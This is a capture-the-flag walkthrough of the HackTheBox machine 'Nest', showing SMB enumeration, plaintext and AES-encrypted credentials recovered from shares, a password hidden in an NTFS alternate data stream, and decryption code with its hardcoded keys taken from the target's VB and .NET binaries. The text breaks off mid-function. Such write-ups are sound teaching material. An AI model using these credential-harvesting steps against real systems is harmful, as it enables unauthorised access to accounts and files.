Hello readers! Here is my write up for this box:
1. Nmap scan
Looking at the nmap scan, we can see two ports that are open: 445 (SMB) and 4386 (mystery service).
root@kali:~/htb/nest# nmap -sC -sV -p- -O -oA nmap_out1 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.037s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
--- SNIP ---
Host script results:
|_clock-skew: 1m54s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-29T04:33:04
|_  start_date: 2020-05-29T04:24:52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 318.91 seconds
2. SMB enumeration
Since port 445 is open, let's see what SMB shares are available. Running smbclient gave me this:
root@kali:~/htb/nest# smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
We can see that apart from the default administrative shares, there are three additional drives: Data, Secure$ and Users. Let's see what we can access as an unauthenticated user:
For the Users drive:
root@kali:~# smbclient \\\\10.10.10.178\\Users
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \> cd ./TempUser\
smb: \TempUser\> ls
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \TempUser\> cd ..
smb: \> cd ./C.Smith\
smb: \C.Smith\> ls
NT_STATUS_ACCESS_DENIED listing \C.Smith\*
smb: \C.Smith\> cd ..
smb: \> cd ./Administrator
smb: \Administrator\> ls
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\> cd ..
smb: \> cd ./L.Frost
smb: \L.Frost\> ls
NT_STATUS_ACCESS_DENIED listing \L.Frost\*
smb: \L.Frost\> cd ..
smb: \> cd ./R.Thompson
smb: \R.Thompson\> ls
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
smb: \R.Thompson\> cd ..
For the Data drive:
root@kali:~# smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Aug  7 18:53:46 2019
  ..                                  D        0  Wed Aug  7 18:53:46 2019
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \> cd ./IT
smb: \IT\> ls
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd ..
smb: \> cd ./Production
smb: \Production\> ls
NT_STATUS_ACCESS_DENIED listing \Production\*
smb: \Production\> cd ..
smb: \> cd ./Reports\
smb: \Reports\> ls
NT_STATUS_ACCESS_DENIED listing \Reports\*
smb: \Reports\> cd ..
smb: \> cd ./Shared\
smb: \Shared\> ls
  .                                   D        0  Wed Aug  7 15:07:51 2019
  ..                                  D        0  Wed Aug  7 15:07:51 2019
  Maintenance                         D        0  Wed Aug  7 15:07:32 2019
  Templates                           D        0  Wed Aug  7 15:08:07 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \Shared\> cd Maintenance\
smb: \Shared\Maintenance\> ls
  .                                   D        0  Wed Aug  7 15:07:32 2019
  ..                                  D        0  Wed Aug  7 15:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 19:01:44 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \Shared\Maintenance\> cd ..
smb: \Shared\> cd ./Templates\
smb: \Shared\Templates\> ls
  .                                   D        0  Wed Aug  7 15:08:07 2019
  ..                                  D        0  Wed Aug  7 15:08:07 2019
  HR                                  D        0  Wed Aug  7 15:08:01 2019
  Marketing                           D        0  Wed Aug  7 15:08:06 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \Shared\Templates\> cd ./HR\
smb: \Shared\Templates\HR\> ls
  .                                   D        0  Wed Aug  7 15:08:01 2019
  ..                                  D        0  Wed Aug  7 15:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \Shared\Templates\HR\> cd ..
smb: \Shared\Templates\> cd ./Marketing\
smb: \Shared\Templates\Marketing\> ls
  .                                   D        0  Wed Aug  7 15:08:06 2019
  ..                                  D        0  Wed Aug  7 15:08:06 2019

                10485247 blocks of size 4096. 6543448 blocks available
For the Secure$ Drive:
root@kali:~# smbclient \\\\10.10.10.178\\Secure$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
So based on the above results, the only folder we are able to view is the Shared folder on the Data drive. Viewing the contents of the two files in it, we get the following:
root@kali:~/htb/nest# cat Maintenance\ Alerts.txt
There is currently no scheduled maintenance work
root@kali:~/htb/nest# cat ./Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR
And we get our first user credentials! The next obvious place to look at is the TempUser folder on the Users drive.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Users -U TempUser%welcome2019
Domain=[HTB-NEST] OS=[] Server=[]
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \> cd ./TempUser\
smb: \TempUser\> ls
  .                                   D        0  Wed Aug  7 18:55:56 2019
  ..                                  D        0  Wed Aug  7 18:55:56 2019
  New Text Document.txt               A        0  Wed Aug  7 18:55:56 2019

                10485247 blocks of size 4096. 6543448 blocks available

root@kali:~/htb/nest# cat "New Text Document.txt"
---- Nothing :( --------
Listing the contents of this folder gives us a single text document with nothing in it. We still aren't able to access any other user folders, so let's move on to the Data drive.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Data -U TempUser%welcome2019
Domain=[HTB-NEST] OS=[] Server=[]
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Aug  7 18:53:46 2019
  ..                                  D        0  Wed Aug  7 18:53:46 2019
  IT                                  D        0  Wed Aug  7 18:58:07 2019
  Production                          D        0  Mon Aug  5 17:53:38 2019
  Reports                             D        0  Mon Aug  5 17:53:44 2019
  Shared                              D        0  Wed Aug  7 15:07:51 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \> cd ./IT
smb: \IT\> ls
  .                                   D        0  Wed Aug  7 18:58:07 2019
  ..                                  D        0  Wed Aug  7 18:58:07 2019
  Archive                             D        0  Mon Aug  5 18:33:58 2019
  Configs                             D        0  Wed Aug  7 18:59:34 2019
  Installs                            D        0  Wed Aug  7 18:08:30 2019
  Reports                             D        0  Sat Jan 25 19:09:13 2020
  Tools                               D        0  Mon Aug  5 18:33:43 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \IT\> cd ./Archive\
smb: \IT\Archive\> ls
  .                                   D        0  Mon Aug  5 18:33:58 2019
  ..                                  D        0  Mon Aug  5 18:33:58 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \IT\Archive\> cd ..
smb: \IT\> cd ./Configs\
smb: \IT\Configs\> ls
  .                                   D        0  Wed Aug  7 18:59:34 2019
  ..                                  D        0  Wed Aug  7 18:59:34 2019
  Adobe                               D        0  Wed Aug  7 15:20:09 2019
  Atlas                               D        0  Tue Aug  6 07:16:18 2019
  DLink                               D        0  Tue Aug  6 09:25:27 2019
  Microsoft                           D        0  Wed Aug  7 15:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 15:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 16:01:13 2019
  Server Manager                      D        0  Tue Aug  6 09:25:19 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \IT\Configs\> cd ./RU Scanner\
cd \IT\Configs\RU\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\Configs\> ls
  .                                   D        0  Wed Aug  7 18:59:34 2019
  ..                                  D        0  Wed Aug  7 18:59:34 2019
  Adobe                               D        0  Wed Aug  7 15:20:09 2019
  Atlas                               D        0  Tue Aug  6 07:16:18 2019
  DLink                               D        0  Tue Aug  6 09:25:27 2019
  Microsoft                           D        0  Wed Aug  7 15:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 15:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 16:01:13 2019
  Server Manager                      D        0  Tue Aug  6 09:25:19 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \IT\Configs\> cd "RU Scanner"
smb: \IT\Configs\RU Scanner\> ls
  .                                   D        0  Wed Aug  7 16:01:13 2019
  ..                                  D        0  Wed Aug  7 16:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 15:49:37 2019

                10485247 blocks of size 4096. 6543448 blocks available
smb: \IT\Configs\RU Scanner\> cd ..
smb: \IT\Configs\> cd ./NotepadPlusPlus
smb: \IT\Configs\NotepadPlusPlus\> ls
  .                                   D        0  Wed Aug  7 15:31:37 2019
  ..                                  D        0  Wed Aug  7 15:31:37 2019
  config.xml                          A     6451  Wed Aug  7 19:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 15:30:27 2019

                10485247 blocks of size 4096. 6543448 blocks available
With the TempUser credentials we are now able to list the IT folder. To keep this brief, I won't show the full enumeration of every directory; the Production and Reports folders contain nothing of importance. The two most interesting files are RU_config.xml and config.xml:
root@kali:~/htb/nest# cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

root@kali:~/htb/nest# cat config.xml
<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
    <GUIConfigs>
    ---- SNIP
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>
The first file holds another set of credentials, but the password is not stored in plaintext: it is a base64 value that turns out to be encrypted. The second file is a Notepad++ configuration file. Most of its content is noise, except for the recent-file history at the very bottom, where one of the file paths points at the Secure$ drive:
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
With that path in hand, let's see whether we can access the Secure$ drive now.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Secure$ -U TempUser%welcome2019
Domain=[HTB-NEST] OS=[] Server=[]
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Aug  7 19:08:12 2019
  ..                                  D        0  Wed Aug  7 19:08:12 2019
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019

                10485247 blocks of size 4096. 6543183 blocks available
smb: \> cd ./Finance\
smb: \Finance\> ls
NT_STATUS_ACCESS_DENIED listing \Finance\*
smb: \Finance\> cd ..
smb: \> cd ./HR
smb: \HR\> ls
NT_STATUS_ACCESS_DENIED listing \HR\*
smb: \HR\> cd ..
smb: \> cd ./IT
smb: \IT\> ls
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd ./Carl
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 15:42:14 2019
  ..                                  D        0  Wed Aug  7 15:42:14 2019
  Docs                                D        0  Wed Aug  7 15:44:00 2019
  Reports                             D        0  Tue Aug  6 09:45:40 2019
  VB Projects                         D        0  Tue Aug  6 10:41:55 2019

                10485247 blocks of size 4096. 6543183 blocks available
With the TempUser credentials we can now list the root of the Secure$ drive, but every top-level folder still denies a listing. However, if we change directory straight into \IT\Carl (the path leaked by the Notepad++ history), we are suddenly able to list again: TempUser has no rights on the IT folder itself, but does on this subfolder.
smb: \IT\Carl\> cd ./Docs
smb: \IT\Carl\Docs\> ls
  .                                   D        0  Wed Aug  7 15:44:00 2019
  ..                                  D        0  Wed Aug  7 15:44:00 2019
  ip.txt                              A       56  Wed Aug  7 15:44:16 2019
  mmc.txt                             A       73  Wed Aug  7 15:43:42 2019

                10485247 blocks of size 4096. 6543183 blocks available
smb: \IT\Carl\Docs\> cd ..
smb: \IT\Carl\> cd ./Reports\
smb: \IT\Carl\Reports\> ls
  .                                   D        0  Tue Aug  6 09:45:40 2019
  ..                                  D        0  Tue Aug  6 09:45:40 2019

                10485247 blocks of size 4096. 6543183 blocks available
smb: \IT\Carl\Reports\> cd ..
smb: \IT\Carl\> cd ./"VB Projects\"
smb: \IT\Carl\VB Projects\> ls
  .                                   D        0  Tue Aug  6 10:41:55 2019
  ..                                  D        0  Tue Aug  6 10:41:55 2019
  Production                          D        0  Tue Aug  6 10:07:13 2019
  WIP                                 D        0  Tue Aug  6 10:47:41 2019

                10485247 blocks of size 4096. 6543183 blocks available
For brevity's sake, I won't display the contents of the files in Docs and Reports, as they are irrelevant. The VB Projects folder, on the other hand, contains the source of a VB application, located in the WIP folder (the Production folder is empty).
smb: \IT\Carl\VB Projects\> cd ./WIP\
smb: \IT\Carl\VB Projects\WIP\> ls
  .                                   D        0  Tue Aug  6 10:47:41 2019
  ..                                  D        0  Tue Aug  6 10:47:41 2019
  RU                                  D        0  Fri Aug  9 11:36:45 2019

                10485247 blocks of size 4096. 6543183 blocks available
smb: \IT\Carl\VB Projects\WIP\> cd ./RU
smb: \IT\Carl\VB Projects\WIP\RU\> ls
  .                                   D        0  Fri Aug  9 11:36:45 2019
  ..                                  D        0  Fri Aug  9 11:36:45 2019
  RUScanner                           D        0  Wed Aug  7 18:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 10:45:36 2019

                10485247 blocks of size 4096. 6543183 blocks available
smb: \IT\Carl\VB Projects\WIP\RU\> cd ./RUScanner
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls
  .                                   D        0  Wed Aug  7 18:05:54 2019
  ..                                  D        0  Wed Aug  7 18:05:54 2019
  bin                                 D        0  Wed Aug  7 16:00:11 2019
  ConfigFile.vb                       A      772  Wed Aug  7 18:05:09 2019
  Module1.vb                          A      279  Wed Aug  7 18:05:44 2019
  My Project                          D        0  Wed Aug  7 16:00:11 2019
  obj                                 D        0  Wed Aug  7 16:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 11:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 08:55:27 2019
  SsoIntegration.vb                   A      133  Wed Aug  7 18:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 15:49:35 2019

                10485247 blocks of size 4096. 6543183 blocks available
If we go back to the RU_config.xml file we found on the Data drive, we realise it was located in a folder called RU Scanner, so this project is almost certainly the code that produced the encrypted password, and with it the key to decrypting it. Since this is a VB.NET application, the easiest way to work with it is Visual Studio on Windows, which makes viewing and building the code a whole lot easier. Simply import the project by opening the RUScanner.sln file. The three most important files are Module1.vb, SsoIntegration.vb and Utils.vb.
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
    End Sub

End Module
Module1.vb shows how RU_Config.xml is loaded and how the stored password is passed through Utils.DecryptString before use.
Public Class SsoIntegration
    Public Property Username As String
    Public Property Password As String
End Class
SsoIntegration.vb shows how the decrypted credentials are held in memory.
--- SNIP ---
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function
--- SNIP ---
Utils.vb contains the actual encryption and decryption routines, with the passphrase, salt, iteration count and IV hardcoded. To get the program to display the decrypted password, we build it and then run it under the debugger: after building, place RU_Config.xml in the same folder as the build output, start a debug session, and set a breakpoint. Since the decryption lives in Utils.vb, we need to find the point in the code where the plaintext is available. Here is the function that does just that:
    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        ' INSERT BREAKPOINT HERE --->
        Console.WriteLine(plainText)

        Return plainText
    End Function
I added the line Console.WriteLine(plainText) to make it easier for me to set up a breakpoint. Once all that is set up, the program runs and stops at the breakpoint, and we can read the value of plainText in the debugger.
The password decrypted to: “xRxRxPANCAK3SxRxRx”.
We can then try logging into the SMB drives with the newly acquired credentials for the user C.Smith (Carl). In this case only the Users drive is relevant, as the directory listings on the other drives yield essentially nothing new.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Users -U C.Smith%xRxRxPANCAK3SxRxRx
Domain=[HTB-NEST] OS=[] Server=[]
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

                10485247 blocks of size 4096. 6545473 blocks available
smb: \> cd ./C.Smith
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 02:21:44 2020
  ..                                  D        0  Sun Jan 26 02:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 19:06:17 2019
  user.txt                            A       32  Thu Aug  8 19:05:24 2019

                10485247 blocks of size 4096. 6545473 blocks available
smb: \C.Smith\> cd "HQK Reporting"
smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

smb: \C.Smith\HQK Reporting\AD Integration Module\> ls
  .                                   D        0  Fri Aug  9 08:18:42 2019
  ..                                  D        0  Fri Aug  9 08:18:42 2019
  HqkLdap.exe                         A    17408  Wed Aug  7 19:41:16 2019

                10485247 blocks of size 4096. 6545457 blocks available
smb: \C.Smith\HQK Reporting\AD Integration Module\> get HqkLdap.exe
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (95.0 KiloBytes/sec) (average 17.6 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\AD Integration Module\> cd ..
smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019
At this point we can grab the user flag and submit it to HackTheBox.
The HQK Reporting folder yields some interesting files: an executable, a config backup and an apparently empty text file. Let's look at the config file first:
root@kali:~/htb/nest/HQK# cat HQK_Config_Backup.xml
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
The config tells us the HQK service listens on port 4386. Looking back at the nmap scan, port 4386 was indeed open and answered with the "HQK Reporting Service V1.2" banner, so that is almost certainly this service. It speaks a plain text protocol, so we can talk to it with telnet 10.10.10.178 4386. On connecting we are greeted with this:
root@kali:~/htb/nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
It looks like a service for running canned database queries. We can freely change directories with the SETDIR command and list the contents of the current directory with LIST. RUNQUERY doesn't seem to work, even on the "legitimate" query files. Then there is the DEBUG command, which unlocks additional functionality, provided you have the password.
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>runquery 1
Invalid database configuration found. Please contact your system administrator
>help debug
DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples:
DEBUG MyPassw0rd
Attempts to enable debug mode by using the password "MyPassw0rd"
If we go back to the password file we found next to the exe, it looks like an empty file. That is not entirely true, though. Let's return to the file on the SMB drive and inspect it with allinfo:
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
The password was simply stored in an NTFS alternate data stream (ADS) named Password, which is why the default ::$DATA stream is 0 bytes and the file appears empty. When downloading the file, make sure you name the stream explicitly; otherwise smbclient fetches only the default stream and the password is left behind. Like the following:
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$DATA"
Once downloaded, we can view the file and see the debug password inside.
root@kali:~/htb/nest# cat Debug\ Mode\ Password.txt\:Password\:\$DATA
WBQ201953D8w
We enter the password on the HQK service on port 4386 and get some additional commands to play with:
root@kali:~/htb/nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2

>Debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>Help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
The most important new command is SHOWQUERY, which prints the contents of a file by its ID. The current folder has nothing interesting, so let's move up one level and look at the LDAP folder, which seems a likely place for credentials.
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>setdir ldap
Current directory set to ldap
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: ldap
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Viewing the file, we find a set of credentials for the Administrator account, with the password stored in the same kind of encrypted form as before. To decrypt it, we will do something similar to what we did to get Carl's password from RU Scanner. This time we don't have the project files, but we do have the executable (HqkLdap.exe, the same file we pulled from C.Smith's share), which means we have to decompile it. Since this is most likely a .NET application, we use a .NET decompiler. Any .NET decompiler will do; the one I used is called JustDecompile.
In the decompiler's left-hand tree there are a few modules, the most important being HqkLdap. Inside it there are four classes; CR is the one that matters, as it contains the code for encrypting and decrypting the passwords. Unlike the RU Scanner application, there is no need to build the project or run a debugger. Instead we can lift the entire CR class and run it on its own. Since the decompiled code contains only the class and no entry point, we need to add a Main, like the following:
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Diagnostics;

namespace HqkLdap
{
    public class CR
    {
        private const string K = "667912";
        private const string I = "1L1SA61493DRV53Z";
        private const string SA = "1313Rf99";

        public CR()
        {
        }

        public static string DS(string EncryptedString)
        {
            if (string.IsNullOrEmpty(EncryptedString))
            {
                return string.Empty;
            }
            return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
        }

        public static string ES(string PlainString)
        {
            if (string.IsNullOrEmpty(PlainString))
            {
                return string.Empty;
            }
            return CR.RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
        }

        private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
        {
            byte[] bytes = Encoding.ASCII.GetBytes(initVector);
            byte[] numArray = Encoding.ASCII.GetBytes(saltValue);
            byte[] numArray1 = Convert.FromBase64String(cipherText);
            Rfc2898DeriveBytes rfc2898DeriveByte = new Rfc2898DeriveBytes(passPhrase, numArray, passwordIterations);
            byte[] bytes1 = rfc2898DeriveByte.GetBytes(checked((int)Math.Round((double)keySize / 8)));
            AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider()
            {
                Mode = CipherMode.CBC
            };
            ICryptoTransform cryptoTransform = aesCryptoServiceProvider.CreateDecryptor(bytes1, bytes);
            MemoryStream memoryStream = new MemoryStream(numArray1);
            CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, CryptoStreamMode.Read);
            byte[] numArray2 = new byte[checked(checked((int)numArray1.Length) + 1)];
            int num = cryptoStream.Read(numArray2, 0, checked((int)numArray2.Length));
            memoryStream.Close();
            cryptoStream.Close();
            return Encoding.ASCII.GetString(numArray2, 0, num);
        }

        private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
        {
            string base64String;
            byte[] bytes = Encoding.ASCII.GetBytes(initVector);
            byte[] numArray = Encoding.ASCII.GetBytes(saltValue);
            byte[] bytes1 = Encoding.ASCII.GetBytes(plainText);
